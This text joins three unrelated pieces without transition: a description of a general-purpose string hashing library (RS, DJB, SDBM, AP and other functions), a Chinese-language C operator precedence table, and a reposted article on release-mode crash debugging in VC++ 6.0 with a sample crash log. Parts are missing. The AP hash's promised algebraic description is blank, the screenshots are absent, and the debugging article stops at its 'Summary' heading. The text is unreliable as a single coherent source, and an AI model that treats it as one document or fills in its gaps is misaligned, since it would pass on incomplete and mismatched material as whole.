The General Hash Functions Library has the following mix of additive and rotative general purpose string hashing algorithms. The following algorithms vary in usefulness and functionality and are mainly intended as an example for learning how hash functions operate and what they basically look like in code form.

• RS Hash Function

  A simple hash function from Robert Sedgwicks Algorithms in C book. I've added some simple optimizations to the algorithm in order to speed up its hashing process.

• JS Hash Function

  A bitwise hash function written by Justin Sobel

• PJW Hash Function

  This hash algorithm is based on work by Peter J. Weinberger of AT&T Bell Labs. The book Compilers (Principles, Techniques and Tools) by Aho, Sethi and Ulman, recommends the use of hash functions that employ the hashing methodology found in this particular algorithm.

• ELF Hash Function

  Similar to the PJW Hash function, but tweaked for 32-bit processors. Its the hash function widely used on most UNIX systems.

• BKDR Hash Function

  This hash function comes from Brian Kernighan and Dennis Ritchie's book "The C Programming Language". It is a simple hash function using a strange set of possible seeds which all constitute a pattern of 31....31...31 etc, it seems to be very similar to the DJB hash function.

• SDBM Hash Function

  This is the algorithm of choice which is used in the open source SDBM project. The hash function seems to have a good over-all distribution for many different data sets. It seems to work well in situations where there is a high variance in the MSBs of the elements in a data set.

• DJB Hash Function

  An algorithm produced by Professor Daniel J. Bernstein and shown first to the world on the usenet newsgroup comp.lang.c. It is one of the most efficient hash functions ever published.

• DEK Hash Function

  An algorithm proposed by Donald E. Knuth in The Art Of Computer Programming Volume 3, under the topic of sorting and search chapter 6.4.

• AP Hash Function

  An algorithm produced by me Arash Partow. I took ideas from all of the above hash functions making a hybrid rotative and additive hash function algorithm. There isn't any real mathematical analysis explaining why one should use this hash function instead of the others described above other than the fact that I tired to resemble the design as close as possible to a simple LFSR. An empirical result which demonstrated the distributive abilities of the hash algorithm was obtained using a hash-table with 100003 buckets, hashing The Project Gutenberg Etext of Webster's Unabridged Dictionary, the longest encountered chain length was 7, the average chain length was 2, the number of empty buckets was 4579. Below is a simple algebraic description of the AP hash function:

  

General Hash Function License

Free use of the General Hash Functions Algorithm Library available on this site is permitted under the guidelines and in accordance with the most current version of the "Common Public License."

Compatability

The General Hash Functions Algorithm Library C\C++ implementation is compatible with the following C\C++ compilers:

• GNU Compiler Collection (3.3.1-x+)
• Intel® C++ Compiler (8.x+)
• Borland C++ Builder (5,6)
• Borland C++ BuilderX
• Borland Turbo C++
• Microsoft Visual C++ Compiler (8.x+)

The General Hash Functions Algorithm Library Object Pascal and Pascal implementations are compatible with the following Object Pascal and Pascal compilers:

• Borland Delphi (1,2,3,4,5,6,7,8,2005,2006)
• Free Pascal Compiler (1.9.x)
• Borland Kylix (1,2,3)
• Borland Turbo Pascal (5,6,7)

The General Hash Functions Algorithm Library Java implementation is compatible with the following Java compilers:

• Sun Microsystems Javac (J2SE1.4+)
• GNU Java Compiler (GJC)
• IBM Java Compiler

Download

• General Hash Function Source Code (C)

• General Hash Function Source Code (C++)

• General Hash Function Source Code (Pascal & Object Pascal)

• General Hash Function Source Code (Java)

• General Hash Function Source Code (Ruby)

• General Hash Function Source Code (Python)

• General Hash Function Source Code (All Languages)

• Bloom Filter Source Code (C++)

• Bloom Filter Source Code (Object Pascal)

• Open Bloom Filter Source Code (C++)

• Selecting a Hashing Algorithm (Bruce J. McKenzie, R. Harries, Timothy C. Bell)

• Cryptographic Hash Functions : A Survey (S. Bakhtiari, R. Safavi-Naini, J. Pieprzyk)

优先级

运算符

含义

参与运算对象的数目

结合方向

 1

( )
[ ]
->
.

圆括号运算符
下标运算符
指向结构体成员运算符
结构体成员运算符

双目运算符
双目运算符
双目运算符

自左至右

2

！
~
++
--
-
(类型)
＊
＆
sizeof

逻辑非运算符
按位取反运算符
自增运算符
自减运算符
负号运算符
类型转换运算符
指针运算符
取地址运算符
求类型长度运算符

单目运算符

自右至左

3

＊
/
%

乘法运算符
除法运算符
求余运算符

双目运算符

自左至右

4

＋
－

加法运算符
减法运算符

双目运算符

自左至右

5

<<
>>

左移运算符
右移运算符

双目运算符

自左至右

6

<
<=
>
>=

关系运算符

双目运算符

自左至右

7

＝＝
！＝

判等运算符
判不等运算符

双目运算符

自左至右

8

＆

按位与运算符

双目运算符

自左至右

9

＾

按位异或运算符

双目运算符

自左至右

10

|

按位或运算符

双目运算符

自左至右

11

＆＆

逻辑与运算符

双目运算符

自左至右

12

||

逻辑或运算符

双目运算符

自左至右

13

？：

条件运算符

三目运算符

自右至左

14

＝
＋＝
－＝
＊＝
/＝
%＝
>>=
<<=
&=
＾=
|＝

赋值运算符

双目运算符

自右至左

15

，

逗号运算符
（顺序求值运算符）

自左至右

[houcy]This article is copied from http://www.codeproject.com/KB/debug/XCrashReportPt1.aspx . I found that debugging is an art more than a skill. So no doubtedly , I must learn this kind of art. It`s a powerful weapon to arm myself.  

Introduction

This was the state I was in when I read Bruce Dawson's paper on Release Mode Debugging. Dawson's paper discusses several techniques that I had never encountered before, including how to capture the instruction pointer (ip) of a crash, and how to plug the ip into VC++ and go directly to the source line of the crash. (I am talking about VC++ 6.0 here, not .Net).

These new techniques led me toward the holy grail of developers: being able to see a stack trace of each function that led up to the crash. At several points along the way, I thought to myself, "Well, this is pretty complete, there's nothing more to add." But then I would see there was another approach, another API I had overlooked, and I kept on.

Bruce Dawson's Techniques

This was the second revelation for me. Tucked away in Dawson's article was a link to some source code that he had published in Game Developer Magazine. The code included an exception handler that captured the ip, system info, and stack at the time of the crash. Best of all, there was also code that could be included in any MFC application, that would automatically call Dawson's exception handler. Here are Dawson's step-by-step directions to add an exception handler to any MFC app:

Preparation

1. Set up your release build to generate debug symbols (pdb)
   
   
   • In your VC++ project, go to Project | Settings. Make sure the Release configuration is selected in the Settings For combobox on the left. Go to the C/C++ tab, select the General category, and select Program Database in the Debug Info combobox. This tells the compiler to generate debug information.

      

      

   • Go to the Link tab and check Generate debug info. This tells the linker to collate debug information into .pdb files. The linker also puts the name of the .pdb file in the executable, so the debugger can find it.
   • On the same Link tab, enter /OPT:REF at the end of the Project Options list. This tells the linker to eliminate functions and/or data that are never referenced. This is the usually the default for release builds, but it gets turned off when you tell the linker to generate debug information. Failing to specify /OPT:REF will cause your executables and DLLs to get 10-20% larger.

     

   
   
2. Include these files in your project:
   • ExceptionAttacher.cpp
   • ExceptionHandler.cpp - should be set to Not using precompiled headers on the C/C++ tab (Precompiled Headers).
   • ExceptionHandler.h
   • GetWinVer.cpp
   • GetWinVer.h
   • MiniVersion.cpp
   • MiniVersion.h
   • CrashFileNames.h

3. Recompile the entire project.
   Tuck away the exe and pdb files. Do not ship the pdb file to customers - this is both unnecessary and may be helpful to someone wanting to reverse-engineer your program.

Theory Into Practice

Here is what the first part of ERRORLOG.TXT looks like:

Collapse

Test1 caused an Access Violation (0xc0000005)
in module Test1.exe at 001b:00402cc0. <=== HERE IS THE IP

Exception handler called in ExceptionAttacher.cpp - AfxWinMain.
Error occurred at 10/18/2003 19:05:08.
D:\temp1\XCrashReportTest\1.1\Test1\Release\Test1.exe, run by hdietrich.
Operating system:  Windows XP (5.1.2600).
1 processor(s), type 586.
32% memory in use.
1024 MBytes physical memory.
687 MBytes physical memory free.
2462 MBytes paging file.
2253 MBytes paging file free.
2048 MBytes user address space.
2033 MBytes user address space free.
Write to location 00000000 caused an access violation.
Context:
EDI:    0x0012fe70  ESI: 0x004043c0  EAX:   0x00000000
EBX:    0x00000001  ECX: 0x0012fe70  EDX:   0x00000000
EIP:    0x00402cc0  EBP: 0x0012f82c  SegCs: 0x0000001b
EFlags: 0x00010246  ESP: 0x0012f820  SegSs: 0x00000023
Bytes at CS:EIP:
c7 05 00 00 00 00 00 00 00 00 c3 90 90 90 90 90
Stack:
0x0012f820: 73dd23d8 004043c0 00000111 0012f85c .#.s.C@.....\...
0x0012f830: 73dd22ae 0012fe70 000003e8 00000000 .".sp...........
0x0012f840: 00402cc0 00000000 0000000c 00000000 .,@.............
0x0012f850: 00000000 0012fe70 000003e8 0012f880 ....p...........
0x0012f860: 73dd8fc5 000003e8 00000000 00000000 ...s............
0x0012f870: 00000000 000003e8 0012fe70 00000000 ........p.......
0x0012f880: 0012f8d0 73dd2976 000003e8 00000000 ....v).s........
0x0012f890: 00000000 00000000 0012fe70 0012fe70 ........p...p...
.
.
.

OK, now we have an ip, plus the exe and its pdb file. The next step is to start up DevStudio, then go to File | Open and browse to the release build of your exe (in this case, ..\Test1\Release\Test1.exe). Next click on Step Into (F11). You should now see this:

Go to View | Debug Windows | Registers. You will see the Registers window:

Now click before the hex value of the EIP register and enter the crash ip (from ERRORLOG.TXT, we know this is 00402cc0). You cannot cut and paste - you must type this in. When typing it in, the changed address will be displayed in red:

When you are finished typing it in, hit Enter, and you will see this:

Summary